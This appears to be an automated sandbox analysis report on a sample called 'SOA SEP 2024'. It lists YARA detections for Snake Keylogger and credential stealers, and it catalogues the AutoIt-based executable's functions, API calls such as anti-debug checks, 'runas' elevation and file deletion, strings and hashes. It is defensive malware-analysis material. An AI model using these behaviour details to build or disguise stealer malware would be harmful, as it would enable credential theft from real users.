00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4553786112.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0.8%
Signature Coverage:	4.5%
Total number of Nodes:	1851
Total number of Limit Nodes:	171

Executed Functions

Function 0078B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88cd4f3698552bf345a0cff7252e389da9876a7f02b6fc4e0b523e860a7d3e15
Instruction ID: 7d071d0c2bf4036230f29bf00d7e1453cdf9fdc8f6dcb00d58a3ea5bd297bd37
Opcode Fuzzy Hash: 88cd4f3698552bf345a0cff7252e389da9876a7f02b6fc4e0b523e860a7d3e15
Instruction Fuzzy Hash: EB326D75B422688FCB24AF54DC856E9B7B5FF4A310F1840D9E40AE7A91D7389E80CF52

Function 00763D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00763AA3,?), ref: 00763D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00763AA3,?), ref: 00763D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00821148,00821130,?,?,?,?,00763AA3,?), ref: 00763DC8

Part of subcall function 00766430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00763DEE,00821148,?,?,?,?,?,00763AA3,?), ref: 00766471

SetCurrentDirectoryW.KERNEL32(?,?,?,00763AA3,?), ref: 00763E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008128F4,00000010), ref: 007D1CCE
SetCurrentDirectoryW.KERNEL32(?,00821148,?,?,?,?,?,00763AA3,?), ref: 007D1D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007FDAB4,00821148,?,?,?,?,?,00763AA3,?), ref: 007D1D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00763AA3), ref: 007D1D90

Part of subcall function 00763E6E: GetSysColorBrush.USER32(0000000F), ref: 00763E79
Part of subcall function 00763E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00763E88
Part of subcall function 00763E6E: LoadIconW.USER32(00000063), ref: 00763E9E
Part of subcall function 00763E6E: LoadIconW.USER32(000000A4), ref: 00763EB0
Part of subcall function 00763E6E: LoadIconW.USER32(000000A2), ref: 00763EC2
Part of subcall function 00763E6E: RegisterClassExW.USER32(?), ref: 00763F30

Part of subcall function 007636B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007636E6
Part of subcall function 007636B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00763707
Part of subcall function 007636B8: ShowWindow.USER32(00000000,?,?,?,?,00763AA3,?), ref: 0076371B
Part of subcall function 007636B8: ShowWindow.USER32(00000000,?,?,?,?,00763AA3,?), ref: 00763724

Part of subcall function 00764FFC: _memset.LIBCMT ref: 00765022
Part of subcall function 00764FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007650CB

Strings

runas, xrefs: 007D1D84
This is a third-party compiled AutoIt script., xrefs: 007D1CC8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: 56cef713b3878b8f9e041b89c1c5cb9415844e95bc696b14c15095a31d591269
Instruction ID: 727132325590305f13869d1d946ed7ed403898ba5915e539c6d513c6fbd25f77
Opcode Fuzzy Hash: 56cef713b3878b8f9e041b89c1c5cb9415844e95bc696b14c15095a31d591269
Instruction Fuzzy Hash: 3B51E830A04288FACF21ABF4DC49DED7B75BF19700F108165F953A6292DA7D4A5ACB31

Function 0077DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0077DDEC
GetCurrentProcess.KERNEL32(00000000,007FDC38,?,?), ref: 0077DEAC
GetNativeSystemInfo.KERNELBASE(?,007FDC38,?,?), ref: 0077DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0077DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0077DF1F
GetSystemInfo.KERNEL32(?,007FDC38,?,?), ref: 0077DF29
GetSystemInfo.KERNEL32(?,007FDC38,?,?), ref: 0077DF35

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 19f7087166365360f2b017264b6771d2a8b2c9444981c62063a5c63c906afb69
Instruction ID: 165904eb253098f159161ce438b9f6a8c3ba15617ca6f61d937ca0cdc734fe52
Opcode Fuzzy Hash: 19f7087166365360f2b017264b6771d2a8b2c9444981c62063a5c63c906afb69
Instruction Fuzzy Hash: 186181B180A3C4DFCF26CF6898C15E97FB46F39300B1985D9D8499F207C6688D0ACB66

Function 0076406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0076449E,?,?,00000000,00000001), ref: 0076407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0076449E,?,?,00000000,00000001), ref: 00764092
LoadResource.KERNEL32(?,00000000,?,?,0076449E,?,?,00000000,00000001,?,?,?,?,?,?,007641FB), ref: 007D4F1A
SizeofResource.KERNEL32(?,00000000,?,?,0076449E,?,?,00000000,00000001,?,?,?,?,?,?,007641FB), ref: 007D4F2F
LockResource.KERNEL32(0076449E,?,?,0076449E,?,?,00000000,00000001,?,?,?,?,?,?,007641FB,00000000), ref: 007D4F42

Strings

SCRIPT, xrefs: 00764088

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 11e0bfa99c2950aab22ddfc502433c91a9bd78d3993ee4efbc747e7ed25dd1c7
Instruction ID: 270818d9ec3051b836b11e4d5cd0477fb621190bf549936298479d91216e06dd
Opcode Fuzzy Hash: 11e0bfa99c2950aab22ddfc502433c91a9bd78d3993ee4efbc747e7ed25dd1c7
Instruction Fuzzy Hash: 8F115E71200751AFE7318B66DC88F677BBDEBC9B51F14816CF6128A6A0DA75DC408A30

Function 007A6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,007D2F49), ref: 007A6CB9
FindFirstFileW.KERNELBASE(?,?), ref: 007A6CCA
FindClose.KERNEL32(00000000), ref: 007A6CDA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 90240b3f8d38dfc563646e6f96c665b98036373d055171d04a6fb6ffc6daca61
Instruction ID: 287b022b43ac714c61a91a51b72d3867f0a476fd0a58a4d3c8c03ce5c375b96e
Opcode Fuzzy Hash: 90240b3f8d38dfc563646e6f96c665b98036373d055171d04a6fb6ffc6daca61
Instruction Fuzzy Hash: 3DE0D8358114149B82306738EC4D4E9376CDE4A339F104705F971C11D0E778ED1055E9

Function 0076E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076E959
timeGetTime.WINMM ref: 0076EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076ED2E
TranslateMessage.USER32(?), ref: 0076ED3F
DispatchMessageW.USER32(?), ref: 0076ED4A
LockWindowUpdate.USER32(00000000), ref: 0076ED79
DestroyWindow.USER32 ref: 0076ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0076ED9F
Sleep.KERNEL32(0000000A), ref: 007D5270
TranslateMessage.USER32(?), ref: 007D59F7
DispatchMessageW.USER32(?), ref: 007D5A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007D5A19

Strings

@TRAY_ID, xrefs: 007D54C9
@GUI_CTRLHANDLE, xrefs: 007D53AC
@GUI_CTRLID, xrefs: 007D5314
@GUI_WINHANDLE, xrefs: 007D5360

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: f768f961065e20b9cbc10bec5f1d8d123d2e7afb5d33dce23430fe485c5bbb14
Instruction ID: 9dc41583d92976fd47a6f6175cebf47dc6d179b6fd269d46c4dfa7a700d5cefa
Opcode Fuzzy Hash: f768f961065e20b9cbc10bec5f1d8d123d2e7afb5d33dce23430fe485c5bbb14
Instruction Fuzzy Hash: 6462B370504340DFEB25DF24C889BAA77E4BF54304F14496EFD8B8B292DB79A845CB62

Function 00795C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00795EC3
___createFile.LIBCMT ref: 00795F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00795F2D
__dosmaperr.LIBCMT ref: 00795F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00795F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00795F6A
__dosmaperr.LIBCMT ref: 00795F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00795F7C
__set_osfhnd.LIBCMT ref: 00795FAC
__lseeki64_nolock.LIBCMT ref: 00796016
__close_nolock.LIBCMT ref: 0079603C
__chsize_nolock.LIBCMT ref: 0079606C
__lseeki64_nolock.LIBCMT ref: 0079607E
__lseeki64_nolock.LIBCMT ref: 00796176
__lseeki64_nolock.LIBCMT ref: 0079618B
__close_nolock.LIBCMT ref: 007961EB

Part of subcall function 0078EA9C: CloseHandle.KERNELBASE(00000000,0080EEF4,00000000,?,00796041,0080EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0078EAEC
Part of subcall function 0078EA9C: GetLastError.KERNEL32(?,00796041,0080EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0078EAF6
Part of subcall function 0078EA9C: __free_osfhnd.LIBCMT ref: 0078EB03
Part of subcall function 0078EA9C: __dosmaperr.LIBCMT ref: 0078EB25

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

__lseeki64_nolock.LIBCMT ref: 0079620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00796342
___createFile.LIBCMT ref: 00796361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0079636E
__dosmaperr.LIBCMT ref: 00796375
__free_osfhnd.LIBCMT ref: 00796395
__invoke_watson.LIBCMT ref: 007963C3
__wsopen_helper.LIBCMT ref: 007963DD

Strings

@, xrefs: 00795F98

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: b853e3c91c66a0a16dfaf6e3075962ce1a63a14d35bff97851951fcf425dff2f
Instruction ID: 4be15935cf9a38fbd424c485703d1b944e1ec825c28d5387f1bd1ae2cb147825
Opcode Fuzzy Hash: b853e3c91c66a0a16dfaf6e3075962ce1a63a14d35bff97851951fcf425dff2f
Instruction Fuzzy Hash: 0B221771A0461A9FEF2A9F68EC89BBD7B71FB15324F244229E9219B2D1C33D8D40C751

Function 0078EE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: cd50a5737c5b74057d0cc17e9a89bdb570e13dced48d2b156e941ed3cac5f83e
Instruction ID: 248bab33747b397dcc413d2444317a31378777909ef312171f96ba037cc5ea91
Opcode Fuzzy Hash: cd50a5737c5b74057d0cc17e9a89bdb570e13dced48d2b156e941ed3cac5f83e
Instruction Fuzzy Hash: 07323870E84285DFDB31AF68D884BAD7BB1BF55314F24806AE8559F293D7389C42CB60

Function 007AFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 007AFA96
_wcschr.LIBCMT ref: 007AFAA4
_wcscpy.LIBCMT ref: 007AFABB
_wcscat.LIBCMT ref: 007AFACA
_wcscat.LIBCMT ref: 007AFAE8
_wcscpy.LIBCMT ref: 007AFB09
__wsplitpath.LIBCMT ref: 007AFBE6
_wcscpy.LIBCMT ref: 007AFC0B
_wcscpy.LIBCMT ref: 007AFC1D
_wcscpy.LIBCMT ref: 007AFC32
_wcscat.LIBCMT ref: 007AFC47
_wcscat.LIBCMT ref: 007AFC59
_wcscat.LIBCMT ref: 007AFC6E

Part of subcall function 007ABFA4: _wcscmp.LIBCMT ref: 007AC03E
Part of subcall function 007ABFA4: __wsplitpath.LIBCMT ref: 007AC083
Part of subcall function 007ABFA4: _wcscpy.LIBCMT ref: 007AC096
Part of subcall function 007ABFA4: _wcscat.LIBCMT ref: 007AC0A9
Part of subcall function 007ABFA4: __wsplitpath.LIBCMT ref: 007AC0CE
Part of subcall function 007ABFA4: _wcscat.LIBCMT ref: 007AC0E4
Part of subcall function 007ABFA4: _wcscat.LIBCMT ref: 007AC0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 007AFA61

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 6dab1d4149a3aacb63bb3be131202391f4f4af824919bb3b7f24051b0af4b8a7
Instruction ID: 306724e51399903ebec881fb0e2dde4ff45a2d272c3b9010f09da836f75654b4
Opcode Fuzzy Hash: 6dab1d4149a3aacb63bb3be131202391f4f4af824919bb3b7f24051b0af4b8a7
Instruction Fuzzy Hash: 6B91A272504205DFCB20EB60C855E9AB3E8BF95310F044969F95997291DB38EA48CBA2

Function 00763F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00763F86
RegisterClassExW.USER32(00000030), ref: 00763FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00763FC1
InitCommonControlsEx.COMCTL32(?), ref: 00763FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00763FEE
LoadIconW.USER32(000000A9), ref: 00764004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00764013

Strings

0, xrefs: 00763F68
AutoIt v3 GUI, xrefs: 00763FA2
+, xrefs: 00763F6F
TaskbarCreated, xrefs: 00763FB6

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: a9bdcc860ab0d38d756e6fb456bb65f8ddd0a1c3fcf1e41929dd87785adc978b
Instruction ID: f180f2a0058709bf8bc35974352a8edf78a863057970491d82970da55ff75f1d
Opcode Fuzzy Hash: a9bdcc860ab0d38d756e6fb456bb65f8ddd0a1c3fcf1e41929dd87785adc978b
Instruction Fuzzy Hash: 2A21F9B5901348AFDF20DFA4EC89BCDBBB4FB18700F10811AF611AA2A0D7B505458F94

Function 007ABFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007ABDB4: __time64.LIBCMT ref: 007ABDBE

Part of subcall function 00764517: _fseek.LIBCMT ref: 0076452F

__wsplitpath.LIBCMT ref: 007AC083

Part of subcall function 00781DFC: __wsplitpath_helper.LIBCMT ref: 00781E3C

_wcscpy.LIBCMT ref: 007AC096
_wcscat.LIBCMT ref: 007AC0A9
__wsplitpath.LIBCMT ref: 007AC0CE
_wcscat.LIBCMT ref: 007AC0E4
_wcscat.LIBCMT ref: 007AC0F7
_wcscmp.LIBCMT ref: 007AC03E

Part of subcall function 007AC56D: _wcscmp.LIBCMT ref: 007AC65D
Part of subcall function 007AC56D: _wcscmp.LIBCMT ref: 007AC670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007AC2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007AC338
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007AC34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007AC35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007AC371

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: bf70b8bba4aa518581186aa8b972e71ac9eff49105e18fa9f729cf4a6c0ec164
Instruction ID: 0600f85d6bdbda5189001227a8423d179a29590b2f2839fbdad9748b75471743
Opcode Fuzzy Hash: bf70b8bba4aa518581186aa8b972e71ac9eff49105e18fa9f729cf4a6c0ec164
Instruction Fuzzy Hash: F0C13CB1A00119EFDF11DF94CC85EDEBBBDAF89300F0041A6F609E6151DB789A448F65

Function 00763742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 007637B3
KillTimer.USER32(?,00000001), ref: 007637DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00763800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0076380B
CreatePopupMenu.USER32 ref: 0076381F
PostQuitMessage.USER32(00000000), ref: 0076382E

Strings

TaskbarCreated, xrefs: 00763806

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
